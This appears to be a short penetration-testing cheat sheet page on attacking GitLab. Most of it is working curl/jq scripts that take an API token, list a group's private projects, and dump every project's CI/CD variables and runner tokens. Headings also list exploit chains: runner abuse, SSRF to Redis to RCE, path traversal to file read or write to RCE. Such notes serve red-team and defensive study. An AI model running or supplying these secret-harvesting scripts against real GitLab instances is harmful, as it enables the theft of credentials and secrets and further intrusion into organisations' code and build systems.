GitLab
Search for Secrets
TOKEN=`cat token`
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"
curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq
# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'
# 2. bash get_secrets.sh
for id in `cat projects`; do
curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'
curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq
curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq
doneGitLab Runners Abuse
SSRF > Redis > RCE (CE/EE)
Path Traversal > LFI > RCE (CE/EE)
Path Traversal > File Write > RCE (EE)
gitlab-rails
Arbitrary File Read
Last updated